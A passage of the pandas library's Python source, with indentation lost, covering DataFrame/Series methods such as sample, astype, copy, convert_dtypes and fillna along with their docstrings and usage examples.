Number of items from axis to return. Cannot be used with `frac`.
Default = 1 if `frac` = None.
frac : float, optional
Fraction of axis items to return. Cannot be used with `n`.
replace : bool, default False
Allow or disallow sampling of the same row more than once.
weights : str or ndarray-like, optional
Default 'None' results in equal probability weighting.
If passed a Series, will align with target object on index. Index
values in weights not found in sampled object will be ignored and
index values in sampled object not in weights will be assigned
weights of zero.
If called on a DataFrame, will accept the name of a column
when axis = 0.
Unless weights are a Series, weights must be same length as axis
being sampled.
If weights do not sum to 1, they will be normalized to sum to 1.
Missing values in the weights column will be treated as zero.
Infinite values not allowed.
random_state : int or numpy.random.RandomState, optional
Seed for the random number generator (if int), or numpy RandomState
object.
axis : {0 or ‘index’, 1 or ‘columns’, None}, default None
Axis to sample. Accepts axis number or name. Default is stat axis
for given data type (0 for Series and DataFrames).
Returns
-------
Series or DataFrame
A new object of same type as caller containing `n` items randomly
sampled from the caller object.
See Also
--------
numpy.random.choice: Generates a random sample from a given 1-D numpy
array.
Notes
-----
If `frac` > 1, `replacement` should be set to `True`.
Examples
--------
>>> df = pd.DataFrame({'num_legs': [2, 4, 8, 0],
... 'num_wings': [2, 0, 0, 0],
... 'num_specimen_seen': [10, 2, 1, 8]},
... index=['falcon', 'dog', 'spider', 'fish'])
>>> df
num_legs num_wings num_specimen_seen
falcon 2 2 10
dog 4 0 2
spider 8 0 1
fish 0 0 8
Extract 3 random elements from the ``Series`` ``df['num_legs']``:
Note that we use `random_state` to ensure the reproducibility of
the examples.
>>> df['num_legs'].sample(n=3, random_state=1)
fish 0
spider 8
falcon 2
Name: num_legs, dtype: int64
A random 50% sample of the ``DataFrame`` with replacement:
>>> df.sample(frac=0.5, replace=True, random_state=1)
num_legs num_wings num_specimen_seen
dog 4 0 2
fish 0 0 8
An upsample sample of the ``DataFrame`` with replacement:
Note that `replace` parameter has to be `True` for `frac` parameter > 1.
>>> df.sample(frac=2, replace=True, random_state=1)
num_legs num_wings num_specimen_seen
dog 4 0 2
fish 0 0 8
falcon 2 2 10
falcon 2 2 10
fish 0 0 8
dog 4 0 2
fish 0 0 8
dog 4 0 2
Using a DataFrame column as weights. Rows with larger value in the
`num_specimen_seen` column are more likely to be sampled.
>>> df.sample(n=2, weights='num_specimen_seen', random_state=1)
num_legs num_wings num_specimen_seen
falcon 2 2 10
fish 0 0 8
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
axis_length = self.shape[axis]
# Process random_state argument
rs = com.random_state(random_state)
# Check weights for compliance
if weights is not None:
# If a series, align with frame
if isinstance(weights, ABCSeries):
weights = weights.reindex(self.axes[axis])
# Strings acceptable if a dataframe and axis = 0
if isinstance(weights, str):
if isinstance(self, ABCDataFrame):
if axis == 0:
try:
weights = self[weights]
except KeyError as err:
raise KeyError(
"String passed to weights not a valid column"
) from err
else:
raise ValueError(
"Strings can only be passed to "
"weights when sampling from rows on "
"a DataFrame"
)
else:
raise ValueError(
"Strings cannot be passed as weights "
"when sampling from a Series."
)
weights = pd.Series(weights, dtype="float64")
if len(weights) != axis_length:
raise ValueError(
"Weights and axis to be sampled must be of same length"
)
if (weights == np.inf).any() or (weights == -np.inf).any():
raise ValueError("weight vector may not include `inf` values")
if (weights < 0).any():
raise ValueError("weight vector many not include negative values")
# If has nan, set to zero.
weights = weights.fillna(0)
# Renormalize if don't sum to 1
if weights.sum() != 1:
if weights.sum() != 0:
weights = weights / weights.sum()
else:
raise ValueError("Invalid weights: weights sum to zero")
weights = weights.values
# If no frac or n, default to n=1.
if n is None and frac is None:
n = 1
elif frac is not None and frac > 1 and not replace:
raise ValueError(
"Replace has to be set to `True` when "
"upsampling the population `frac` > 1."
)
elif n is not None and frac is None and n % 1 != 0:
raise ValueError("Only integers accepted as `n` values")
elif n is None and frac is not None:
n = int(round(frac * axis_length))
elif n is not None and frac is not None:
raise ValueError("Please enter a value for `frac` OR `n`, not both")
# Check for negative sizes
if n < 0:
raise ValueError(
"A negative number of rows requested. Please provide positive value."
)
locs = rs.choice(axis_length, size=n, replace=replace, p=weights)
return self.take(locs, axis=axis)
_shared_docs[
"pipe"
] = r"""
Apply func(self, \*args, \*\*kwargs).
Parameters
----------
func : function
Function to apply to the %(klass)s.
``args``, and ``kwargs`` are passed into ``func``.
Alternatively a ``(callable, data_keyword)`` tuple where
``data_keyword`` is a string indicating the keyword of
``callable`` that expects the %(klass)s.
args : iterable, optional
Positional arguments passed into ``func``.
kwargs : mapping, optional
A dictionary of keyword arguments passed into ``func``.
Returns
-------
object : the return type of ``func``.
See Also
--------
DataFrame.apply : Apply a function along input axis of DataFrame.
DataFrame.applymap : Apply a function elementwise on a whole DataFrame.
Series.map : Apply a mapping correspondence on a
:class:`~pandas.Series`.
Notes
-----
Use ``.pipe`` when chaining together functions that expect
Series, DataFrames or GroupBy objects. Instead of writing
>>> f(g(h(df), arg1=a), arg2=b, arg3=c)
You can write
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe(f, arg2=b, arg3=c)
... )
If you have a function that takes the data as (say) the second
argument, pass a tuple indicating which keyword expects the
data. For example, suppose ``f`` takes its data as ``arg2``:
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe((f, 'arg2'), arg1=a, arg3=c)
... )
"""
@Appender(_shared_docs["pipe"] % _shared_doc_kwargs)
def pipe(self, func, *args, **kwargs):
return com.pipe(self, func, *args, **kwargs)
_shared_docs["aggregate"] = dedent(
"""
Aggregate using one or more operations over the specified axis.
%(versionadded)s
Parameters
----------
func : function, str, list or dict
Function to use for aggregating the data. If a function, must either
work when passed a %(klass)s or when passed to %(klass)s.apply.
Accepted combinations are:
- function
- string function name
- list of functions and/or function names, e.g. ``[np.sum, 'mean']``
- dict of axis labels -> functions, function names or list of such.
%(axis)s
*args
Positional arguments to pass to `func`.
**kwargs
Keyword arguments to pass to `func`.
Returns
-------
scalar, Series or DataFrame
The return can be:
* scalar : when Series.agg is called with single function
* Series : when DataFrame.agg is called with a single function
* DataFrame : when DataFrame.agg is called with several functions
Return scalar, Series or DataFrame.
%(see_also)s
Notes
-----
`agg` is an alias for `aggregate`. Use the alias.
A passed user-defined-function will be passed a Series for evaluation.
%(examples)s"""
)
_shared_docs[
"transform"
] = """
Call ``func`` on self producing a %(klass)s with transformed values.
Produced %(klass)s will have same axis length as self.
Parameters
----------
func : function, str, list or dict
Function to use for transforming the data. If a function, must either
work when passed a %(klass)s or when passed to %(klass)s.apply.
Accepted combinations are:
- function
- string function name
- list of functions and/or function names, e.g. ``[np.exp. 'sqrt']``
- dict of axis labels -> functions, function names or list of such.
%(axis)s
*args
Positional arguments to pass to `func`.
**kwargs
Keyword arguments to pass to `func`.
Returns
-------
%(klass)s
A %(klass)s that must have the same length as self.
Raises
------
ValueError : If the returned %(klass)s has a different length than self.
See Also
--------
%(klass)s.agg : Only perform aggregating type operations.
%(klass)s.apply : Invoke function on a %(klass)s.
Examples
--------
>>> df = pd.DataFrame({'A': range(3), 'B': range(1, 4)})
>>> df
A B
0 0 1
1 1 2
2 2 3
>>> df.transform(lambda x: x + 1)
A B
0 1 2
1 2 3
2 3 4
Even though the resulting %(klass)s must have the same length as the
input %(klass)s, it is possible to provide several input functions:
>>> s = pd.Series(range(3))
>>> s
0 0
1 1
2 2
dtype: int64
>>> s.transform([np.sqrt, np.exp])
sqrt exp
0 0.000000 1.000000
1 1.000000 2.718282
2 1.414214 7.389056
"""
# ----------------------------------------------------------------------
# Attribute access
def __finalize__(
self: FrameOrSeries, other, method=None, **kwargs
) -> FrameOrSeries:
"""
Propagate metadata from other to self.
Parameters
----------
other : the object from which to get the attributes that we are going
to propagate
method : optional, a passed method name ; possibly to take different
types of propagation actions based on this
"""
if isinstance(other, NDFrame):
for name in other.attrs:
self.attrs[name] = other.attrs[name]
# For subclasses using _metadata.
for name in self._metadata:
assert isinstance(name, str)
object.__setattr__(self, name, getattr(other, name, None))
return self
def __getattr__(self, name: str):
"""
After regular attribute access, try looking up the name
This allows simpler access to columns for interactive use.
"""
# Note: obj.x will always call obj.__getattribute__('x') prior to
# calling obj.__getattr__('x').
if (
name in self._internal_names_set
or name in self._metadata
or name in self._accessors
):
return object.__getattribute__(self, name)
else:
if self._info_axis._can_hold_identifiers_and_holds_name(name):
return self[name]
return object.__getattribute__(self, name)
def __setattr__(self, name: str, value) -> None:
"""
After regular attribute access, try setting the name
This allows simpler access to columns for interactive use.
"""
# first try regular attribute access via __getattribute__, so that
# e.g. ``obj.x`` and ``obj.x = 4`` will always reference/modify
# the same attribute.
try:
object.__getattribute__(self, name)
return object.__setattr__(self, name, value)
except AttributeError:
pass
# if this fails, go on to more involved attribute setting
# (note that this matches __getattr__, above).
if name in self._internal_names_set:
object.__setattr__(self, name, value)
elif name in self._metadata:
object.__setattr__(self, name, value)
else:
try:
existing = getattr(self, name)
if isinstance(existing, Index):
object.__setattr__(self, name, value)
elif name in self._info_axis:
self[name] = value
else:
object.__setattr__(self, name, value)
except (AttributeError, TypeError):
if isinstance(self, ABCDataFrame) and (is_list_like(value)):
warnings.warn(
"Pandas doesn't allow columns to be "
"created via a new attribute name - see "
"https://pandas.pydata.org/pandas-docs/"
"stable/indexing.html#attribute-access",
stacklevel=2,
)
object.__setattr__(self, name, value)
def _dir_additions(self):
"""
add the string-like attributes from the info_axis.
If info_axis is a MultiIndex, it's first level values are used.
"""
additions = {
c
for c in self._info_axis.unique(level=0)[:100]
if isinstance(c, str) and c.isidentifier()
}
return super()._dir_additions().union(additions)
# ----------------------------------------------------------------------
# Consolidation of internals
def _protect_consolidate(self, f):
"""
Consolidate _data -- if the blocks have changed, then clear the
cache
"""
blocks_before = len(self._data.blocks)
result = f()
if len(self._data.blocks) != blocks_before:
self._clear_item_cache()
return result
def _consolidate_inplace(self) -> None:
"""Consolidate data in place and return None"""
def f():
self._data = self._data.consolidate()
self._protect_consolidate(f)
def _consolidate(self, inplace: bool_t = False):
"""
Compute NDFrame with "consolidated" internals (data of each dtype
grouped together in a single ndarray).
Parameters
----------
inplace : bool, default False
If False return new object, otherwise modify existing object.
Returns
-------
consolidated : same type as caller
"""
inplace = validate_bool_kwarg(inplace, "inplace")
if inplace:
self._consolidate_inplace()
else:
f = lambda: self._data.consolidate()
cons_data = self._protect_consolidate(f)
return self._constructor(cons_data).__finalize__(self)
@property
def _is_mixed_type(self) -> bool_t:
f = lambda: self._data.is_mixed_type
return self._protect_consolidate(f)
@property
def _is_numeric_mixed_type(self) -> bool_t:
f = lambda: self._data.is_numeric_mixed_type
return self._protect_consolidate(f)
def _check_inplace_setting(self, value) -> bool_t:
""" check whether we allow in-place setting with this type of value """
if self._is_mixed_type:
if not self._is_numeric_mixed_type:
# allow an actual np.nan thru
if is_float(value) and np.isnan(value):
return True
raise TypeError(
"Cannot do inplace boolean setting on "
"mixed-types with a non np.nan value"
)
return True
def _get_numeric_data(self):
return self._constructor(self._data.get_numeric_data()).__finalize__(self)
def _get_bool_data(self):
return self._constructor(self._data.get_bool_data()).__finalize__(self)
# ----------------------------------------------------------------------
# Internal Interface Methods
@property
def values(self) -> np.ndarray:
"""
Return a Numpy representation of the DataFrame.
.. warning::
We recommend using :meth:`DataFrame.to_numpy` instead.
Only the values in the DataFrame will be returned, the axes labels
will be removed.
Returns
-------
numpy.ndarray
The values of the DataFrame.
See Also
--------
DataFrame.to_numpy : Recommended alternative to this method.
DataFrame.index : Retrieve the index labels.
DataFrame.columns : Retrieving the column names.
Notes
-----
The dtype will be a lower-common-denominator dtype (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen. Use this
with care if you are not dealing with the blocks.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
float32. If dtypes are int32 and uint8, dtype will be upcast to
int32. By :func:`numpy.find_common_type` convention, mixing int64
and uint64 will result in a float64 dtype.
Examples
--------
A DataFrame where all columns are the same type (e.g., int64) results
in an array of the same type.
>>> df = pd.DataFrame({'age': [ 3, 29],
... 'height': [94, 170],
... 'weight': [31, 115]})
>>> df
age height weight
0 3 94 31
1 29 170 115
>>> df.dtypes
age int64
height int64
weight int64
dtype: object
>>> df.values
array([[ 3, 94, 31],
[ 29, 170, 115]], dtype=int64)
A DataFrame with mixed type columns(e.g., str/object, int64, float32)
results in an ndarray of the broadest type that accommodates these
mixed types (e.g., object).
>>> df2 = pd.DataFrame([('parrot', 24.0, 'second'),
... ('lion', 80.5, 1),
... ('monkey', np.nan, None)],
... columns=('name', 'max_speed', 'rank'))
>>> df2.dtypes
name object
max_speed float64
rank object
dtype: object
>>> df2.values
array([['parrot', 24.0, 'second'],
['lion', 80.5, 1],
['monkey', nan, None]], dtype=object)
"""
self._consolidate_inplace()
return self._data.as_array(transpose=self._AXIS_REVERSED)
@property
def _values(self) -> np.ndarray:
"""internal implementation"""
return self.values
def _internal_get_values(self) -> np.ndarray:
"""
Return an ndarray after converting sparse values to dense.
This is the same as ``.values`` for non-sparse data. For sparse
data contained in a `SparseArray`, the data are first
converted to a dense representation.
Returns
-------
numpy.ndarray
Numpy representation of DataFrame.
See Also
--------
values : Numpy representation of DataFrame.
SparseArray : Container for sparse data.
"""
return self.values
@property
def dtypes(self):
"""
Return the dtypes in the DataFrame.
This returns a Series with the data type of each column.
The result's index is the original DataFrame's columns. Columns
with mixed types are stored with the ``object`` dtype. See
:ref:`the User Guide <basics.dtypes>` for more.
Returns
-------
pandas.Series
The data type of each column.
Examples
--------
>>> df = pd.DataFrame({'float': [1.0],
... 'int': [1],
... 'datetime': [pd.Timestamp('20180310')],
... 'string': ['foo']})
>>> df.dtypes
float float64
int int64
datetime datetime64[ns]
string object
dtype: object
"""
from pandas import Series
return Series(self._data.get_dtypes(), index=self._info_axis, dtype=np.object_)
def _to_dict_of_blocks(self, copy: bool_t = True):
"""
Return a dict of dtype -> Constructor Types that
each is a homogeneous dtype.
Internal ONLY
"""
return {
k: self._constructor(v).__finalize__(self)
for k, v, in self._data.to_dict(copy=copy).items()
}
def astype(
self: FrameOrSeries, dtype, copy: bool_t = True, errors: str = "raise"
) -> FrameOrSeries:
"""
Cast a pandas object to a specified dtype ``dtype``.
Parameters
----------
dtype : data type, or dict of column name -> data type
Use a numpy.dtype or Python type to cast entire pandas object to
the same type. Alternatively, use {col: dtype, ...}, where col is a
column label and dtype is a numpy.dtype or Python type to cast one
or more of the DataFrame's columns to column-specific types.
copy : bool, default True
Return a copy when ``copy=True`` (be very careful setting
``copy=False`` as changes to values then may propagate to other
pandas objects).
errors : {'raise', 'ignore'}, default 'raise'
Control raising of exceptions on invalid data for provided dtype.
- ``raise`` : allow exceptions to be raised
- ``ignore`` : suppress exceptions. On error return original object.
Returns
-------
casted : same type as caller
See Also
--------
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
to_numeric : Convert argument to a numeric type.
numpy.ndarray.astype : Cast a numpy array to a specified type.
Examples
--------
Create a DataFrame:
>>> d = {'col1': [1, 2], 'col2': [3, 4]}
>>> df = pd.DataFrame(data=d)
>>> df.dtypes
col1 int64
col2 int64
dtype: object
Cast all columns to int32:
>>> df.astype('int32').dtypes
col1 int32
col2 int32
dtype: object
Cast col1 to int32 using a dictionary:
>>> df.astype({'col1': 'int32'}).dtypes
col1 int32
col2 int64
dtype: object
Create a series:
>>> ser = pd.Series([1, 2], dtype='int32')
>>> ser
0 1
1 2
dtype: int32
>>> ser.astype('int64')
0 1
1 2
dtype: int64
Convert to categorical type:
>>> ser.astype('category')
0 1
1 2
dtype: category
Categories (2, int64): [1, 2]
Convert to ordered categorical type with custom ordering:
>>> cat_dtype = pd.api.types.CategoricalDtype(
... categories=[2, 1], ordered=True)
>>> ser.astype(cat_dtype)
0 1
1 2
dtype: category
Categories (2, int64): [2 < 1]
Note that using ``copy=False`` and changing data on a new
pandas object may propagate changes:
>>> s1 = pd.Series([1, 2])
>>> s2 = s1.astype('int64', copy=False)
>>> s2[0] = 10
>>> s1 # note that s1[0] has changed too
0 10
1 2
dtype: int64
"""
if is_dict_like(dtype):
if self.ndim == 1: # i.e. Series
if len(dtype) > 1 or self.name not in dtype:
raise KeyError(
"Only the Series name can be used for "
"the key in Series dtype mappings."
)
new_type = dtype[self.name]
return self.astype(new_type, copy, errors)
for col_name in dtype.keys():
if col_name not in self:
raise KeyError(
"Only a column name can be used for the "
"key in a dtype mappings argument."
)
results = []
for col_name, col in self.items():
if col_name in dtype:
results.append(
col.astype(dtype=dtype[col_name], copy=copy, errors=errors)
)
else:
results.append(col.copy() if copy else col)
elif is_extension_array_dtype(dtype) and self.ndim > 1:
# GH 18099/22869: columnwise conversion to extension dtype
# GH 24704: use iloc to handle duplicate column names
results = [
self.iloc[:, i].astype(dtype, copy=copy)
for i in range(len(self.columns))
]
else:
# else, only a single dtype is given
new_data = self._data.astype(dtype=dtype, copy=copy, errors=errors)
return self._constructor(new_data).__finalize__(self)
# GH 19920: retain column metadata after concat
result = pd.concat(results, axis=1, copy=False)
result.columns = self.columns
return result
def copy(self: FrameOrSeries, deep: bool_t = True) -> FrameOrSeries:
"""
Make a copy of this object's indices and data.
When ``deep=True`` (default), a new object will be created with a
copy of the calling object's data and indices. Modifications to
the data or indices of the copy will not be reflected in the
original object (see notes below).
When ``deep=False``, a new object will be created without copying
the calling object's data or index (only references to the data
and index are copied). Any changes to the data of the original
will be reflected in the shallow copy (and vice versa).
Parameters
----------
deep : bool, default True
Make a deep copy, including a copy of the data and the indices.
With ``deep=False`` neither the indices nor the data are copied.
Returns
-------
copy : Series or DataFrame
Object type matches caller.
Notes
-----
When ``deep=True``, data is copied but actual Python objects
will not be copied recursively, only the reference to the object.
This is in contrast to `copy.deepcopy` in the Standard Library,
which recursively copies object data (see examples below).
While ``Index`` objects are copied when ``deep=True``, the underlying
numpy array is not copied for performance reasons. Since ``Index`` is
immutable, the underlying data can be safely shared and a copy
is not needed.
Examples
--------
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> s
a 1
b 2
dtype: int64
>>> s_copy = s.copy()
>>> s_copy
a 1
b 2
dtype: int64
**Shallow copy versus default (deep) copy:**
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> deep = s.copy()
>>> shallow = s.copy(deep=False)
Shallow copy shares data and index with original.
>>> s is shallow
False
>>> s.values is shallow.values and s.index is shallow.index
True
Deep copy has own copy of data and index.
>>> s is deep
False
>>> s.values is deep.values or s.index is deep.index
False
Updates to the data shared by shallow copy and original is reflected
in both; deep copy remains unchanged.
>>> s[0] = 3
>>> shallow[1] = 4
>>> s
a 3
b 4
dtype: int64
>>> shallow
a 3
b 4
dtype: int64
>>> deep
a 1
b 2
dtype: int64
Note that when copying an object containing Python objects, a deep copy
will copy the data, but will not do so recursively. Updating a nested
data object will be reflected in the deep copy.
>>> s = pd.Series([[1, 2], [3, 4]])
>>> deep = s.copy()
>>> s[0][0] = 10
>>> s
0 [10, 2]
1 [3, 4]
dtype: object
>>> deep
0 [10, 2]
1 [3, 4]
dtype: object
"""
data = self._data.copy(deep=deep)
return self._constructor(data).__finalize__(self)
def __copy__(self: FrameOrSeries, deep: bool_t = True) -> FrameOrSeries:
return self.copy(deep=deep)
def __deepcopy__(self: FrameOrSeries, memo=None) -> FrameOrSeries:
"""
Parameters
----------
memo, default None
Standard signature. Unused
"""
return self.copy(deep=True)
def _convert(
self: FrameOrSeries,
datetime: bool_t = False,
numeric: bool_t = False,
timedelta: bool_t = False,
coerce: bool_t = False,
copy: bool_t = True,
) -> FrameOrSeries:
"""
Attempt to infer better dtype for object columns
Parameters
----------
datetime : bool, default False
If True, convert to date where possible.
numeric : bool, default False
If True, attempt to convert to numbers (including strings), with
unconvertible values becoming NaN.
timedelta : bool, default False
If True, convert to timedelta where possible.
coerce : bool, default False
If True, force conversion with unconvertible values converted to
nulls (NaN or NaT).
copy : bool, default True
If True, return a copy even if no copy is necessary (e.g. no
conversion was done). Note: This is meant for internal use, and
should not be confused with inplace.
Returns
-------
converted : same as input object
"""
validate_bool_kwarg(datetime, "datetime")
validate_bool_kwarg(numeric, "numeric")
validate_bool_kwarg(timedelta, "timedelta")
validate_bool_kwarg(coerce, "coerce")
validate_bool_kwarg(copy, "copy")
return self._constructor(
self._data.convert(
datetime=datetime,
numeric=numeric,
timedelta=timedelta,
coerce=coerce,
copy=copy,
)
).__finalize__(self)
def infer_objects(self: FrameOrSeries) -> FrameOrSeries:
"""
Attempt to infer better dtypes for object columns.
Attempts soft conversion of object-dtyped
columns, leaving non-object and unconvertible
columns unchanged. The inference rules are the
same as during normal Series/DataFrame construction.
.. versionadded:: 0.21.0
Returns
-------
converted : same type as input object
See Also
--------
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
to_numeric : Convert argument to numeric type.
convert_dtypes : Convert argument to best possible dtype.
Examples
--------
>>> df = pd.DataFrame({"A": ["a", 1, 2, 3]})
>>> df = df.iloc[1:]
>>> df
A
1 1
2 2
3 3
>>> df.dtypes
A object
dtype: object
>>> df.infer_objects().dtypes
A int64
dtype: object
"""
# numeric=False necessary to only soft convert;
# python objects will still be converted to
# native numpy numeric types
return self._constructor(
self._data.convert(
datetime=True, numeric=False, timedelta=True, coerce=False, copy=True
)
).__finalize__(self)
def convert_dtypes(
self: FrameOrSeries,
infer_objects: bool_t = True,
convert_string: bool_t = True,
convert_integer: bool_t = True,
convert_boolean: bool_t = True,
) -> FrameOrSeries:
"""
Convert columns to best possible dtypes using dtypes supporting ``pd.NA``.
.. versionadded:: 1.0.0
Parameters
----------
infer_objects : bool, default True
Whether object dtypes should be converted to the best possible types.
convert_string : bool, default True
Whether object dtypes should be converted to ``StringDtype()``.
convert_integer : bool, default True
Whether, if possible, conversion can be done to integer extension types.
convert_boolean : bool, defaults True
Whether object dtypes should be converted to ``BooleanDtypes()``.
Returns
-------
Series or DataFrame
Copy of input object with new dtype.
See Also
--------
infer_objects : Infer dtypes of objects.
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
to_numeric : Convert argument to a numeric type.
Notes
-----
By default, ``convert_dtypes`` will attempt to convert a Series (or each
Series in a DataFrame) to dtypes that support ``pd.NA``. By using the options
``convert_string``, ``convert_integer``, and ``convert_boolean``, it is
possible to turn off individual conversions to ``StringDtype``, the integer
extension types or ``BooleanDtype``, respectively.
For object-dtyped columns, if ``infer_objects`` is ``True``, use the inference
rules as during normal Series/DataFrame construction. Then, if possible,
convert to ``StringDtype``, ``BooleanDtype`` or an appropriate integer extension
type, otherwise leave as ``object``.
If the dtype is integer, convert to an appropriate integer extension type.
If the dtype is numeric, and consists of all integers, convert to an
appropriate integer extension type.
In the future, as new dtypes are added that support ``pd.NA``, the results
of this method will change to support those new dtypes.
Examples
--------
>>> df = pd.DataFrame(
... {
... "a": pd.Series([1, 2, 3], dtype=np.dtype("int32")),
... "b": pd.Series(["x", "y", "z"], dtype=np.dtype("O")),
... "c": pd.Series([True, False, np.nan], dtype=np.dtype("O")),
... "d": pd.Series(["h", "i", np.nan], dtype=np.dtype("O")),
... "e": pd.Series([10, np.nan, 20], dtype=np.dtype("float")),
... "f": pd.Series([np.nan, 100.5, 200], dtype=np.dtype("float")),
... }
... )
Start with a DataFrame with default dtypes.
>>> df
a b c d e f
0 1 x True h 10.0 NaN
1 2 y False i NaN 100.5
2 3 z NaN NaN 20.0 200.0
>>> df.dtypes
a int32
b object
c object
d object
e float64
f float64
dtype: object
Convert the DataFrame to use best possible dtypes.
>>> dfn = df.convert_dtypes()
>>> dfn
a b c d e f
0 1 x True h 10 NaN
1 2 y False i <NA> 100.5
2 3 z <NA> <NA> 20 200.0
>>> dfn.dtypes
a Int32
b string
c boolean
d string
e Int64
f float64
dtype: object
Start with a Series of strings and missing data represented by ``np.nan``.
>>> s = pd.Series(["a", "b", np.nan])
>>> s
0 a
1 b
2 NaN
dtype: object
Obtain a Series with dtype ``StringDtype``.
>>> s.convert_dtypes()
0 a
1 b
2 <NA>
dtype: string
"""
if self.ndim == 1:
return self._convert_dtypes(
infer_objects, convert_string, convert_integer, convert_boolean
)
else:
results = [
col._convert_dtypes(
infer_objects, convert_string, convert_integer, convert_boolean
)
for col_name, col in self.items()
]
result = pd.concat(results, axis=1, copy=False)
return result
# ----------------------------------------------------------------------
# Filling NA's
@doc(**_shared_doc_kwargs)
def fillna(
self: FrameOrSeries,
value=None,
method=None,
axis=None,
inplace: bool_t = False,
limit=None,
downcast=None,
) -> Optional[FrameOrSeries]:
"""
Fill NA/NaN values using the specified method.
Parameters
----------
value : scalar, dict, Series, or DataFrame
Value to use to fill holes (e.g. 0), alternately a
dict/Series/DataFrame of values specifying which value to use for
each index (for a Series) or column (for a DataFrame). Values not
in the dict/Series/DataFrame will not be filled. This value cannot
be a list.
method : {{'backfill', 'bfill', 'pad', 'ffill', None}}, default None
Method to use for filling holes in reindexed Series
pad / ffill: propagate last valid observation forward to next valid
backfill / bfill: use next valid observation to fill gap.
axis : {axes_single_arg}
Axis along which to fill missing values.
inplace : bool, default False
If True, fill in-place. Note: this will modify any
other views on this object (e.g., a no-copy slice for a column in a
DataFrame).
limit : int, default None
If method is specified, this is the maximum number of consecutive
NaN values to forward/backward fill. In other words, if there is
a gap with more than this number of consecutive NaNs, it will only
be partially filled. If method is not specified, this is the
maximum number of entries along the entire axis where NaNs will be
filled. Must be greater than 0 if not None.
downcast : dict, default is None
A dict of item->dtype of what to downcast if possible,
or the string 'infer' which will try to downcast to an appropriate
equal type (e.g. float64 to int64 if possible).
Returns
-------
{klass} or None
Object with missing values filled or None if ``inplace=True``.
See Also
--------
interpolate : Fill NaN values using interpolation.
reindex : Conform object to new index.
asfreq : Convert TimeSeries to specified frequency.
Examples
--------
>>> df = pd.DataFrame([[np.nan, 2, np.nan, 0],
... [3, 4, np.nan, 1],
... [np.nan, np.nan, np.nan, 5],
... [np.nan, 3, np.nan, 4]],
... columns=list('ABCD'))
>>> df
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 NaN NaN NaN 5
3 NaN 3.0 NaN 4
Replace all NaN elements with 0s.
>>> df.fillna(0)
A B C D
0 0.0 2.0 0.0 0
1 3.0 4.0 0.0 1
2 0.0 0.0 0.0 5
3 0.0 3.0 0.0 4
We can also propagate non-null values forward or backward.
>>> df.fillna(method='ffill')
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 3.0 4.0 NaN 5
3 3.0 3.0 NaN 4
Replace all NaN elements in column 'A', 'B', 'C', and 'D', with 0, 1,
2, and 3 respectively.
>>> values = {{'A': 0, 'B': 1, 'C': 2, 'D': 3}}
>>> df.fillna(value=values)
A B C D
0 0.0 2.0 2.0 0
1 3.0 4.0 2.0 1
2 0.0 1.0 2.0 5
3 0.0 3.0 2.0 4
Only replace the first NaN element.
>>> df.fillna(value=values, limit=1)
A B C D
0 0.0 2.0 2.0 0
1 3.0 4.0 NaN 1
2 NaN 1.0 NaN 5
3 NaN 3.0 NaN 4
"""
inplace = validate_bool_kwarg(inplace, "inplace")
value, method = validate_fillna_kwargs(value, method)
self._consolidate_inplace()
# set the default here, so functions examining the signaure
# can detect if something was set (e.g. in groupby) (GH9221)
if axis is None:
axis = 0
axis = self._get_axis_number(axis)
if value is None:
if self._is_mixed_type and axis == 1:
if inplace:
raise NotImplementedError()
result = self.T.fillna(method=method, limit=limit).T
# need to downcast here because of all of the transposes
result._data = result._data.downcast()
return result
new_data = self._data.interpolate(
method=method,
axis=axis,
limit=limit,
inplace=inplace,
coerce=True,
downcast=downcast,
)
else:
if len(self._get_axis(axis)) == 0:
return self
if self.ndim == 1:
if isinstance(value, (dict, ABCSeries)):
value = create_series_with_explicit_dtype(
value, dtype_if_empty=object
)
elif not is_list_like(value):
pass
else:
raise TypeError(
'"value" parameter must be a scalar, dict '
"or Series, but you passed a "
f'"{type(value).__name__}"'
)
new_data = self._data.fillna(
value=value, limit=limit, inplace=inplace, downcast=downcast
)
elif isinstance(value, (dict, ABCSeries)):
if axis == 1:
raise NotImplementedError(
"Currently only can fill "
"with dict/Series column "
"by column"
)
result = self if inplace else self.copy()
for k, v in value.items():
if k not in result:
continue
obj = result[k]
obj.fillna(v, limit=limit, inplace=True, downcast=downcast)
return result if not inplace else None
elif not is_list_like(value):
new_data = self._data.fillna(
value=value, limit=limit, inplace=inplace, downcast=downcast
)
elif isinstance(value, ABCDataFrame) and self.ndim == 2:
new_data = self.where(self.notna(), value)
else:
raise ValueError(f"invalid fill value with a {type(value)}")
if inplace:
self._update_inplace(new_data)
return None
else:
return self._constructor(new_data).__finalize__(self)
def ffill(
self: FrameOrSeries,
axis=None,
inplace: bool_t = False,
limit=None,
downcast=None,
) -> Optional[FrameOrSeries]:
"""
Synonym for :meth:`DataFrame.fillna` with ``method='ffill'``.
Returns
-------
%(klass)s or None
Object with missing values filled or None if ``inplace=True``.
"""
return self.fillna(
method="ffill", axis=axis, inplace=inplace, limit=limit, downcast=downcast
)
def bfill(
self: FrameOrSeries,
axis=None,
inplace: bool_t = False,
limit=None,
downcast=None,
) -> Optional[FrameOrSeries]:
"""
Synonym for :meth:`DataFrame.fillna` with ``method='bfill'``.
Returns
-------
%(klass)s or None
Object with missing values filled or None if ``inplace=True``.
"""
return self.fillna(
method="bfill", axis=axis, inplace=inplace, limit=limit, downcast=downcast
)
_shared_docs[
"replace"
] = """
Replace values given in `to_replace` with `value`.
Values of the %(klass)s are replaced with other values dynamically.
This differs from updating with ``.loc`` or ``.iloc``, which require
you to specify a location to update with some value.
Parameters
----------
to_replace : str, regex, list, dict, Series, int, float, or None
How to find the values that will be replaced.
* numeric, str or regex:
- numeric: numeric values equal to `to_replace` will be
replaced with `value`
- str: string exactly matching `to_replace` will be replaced
with `value`
- regex: regexs matching `to_replace` will be replaced with
`value`
* list of str, regex, or numeric:
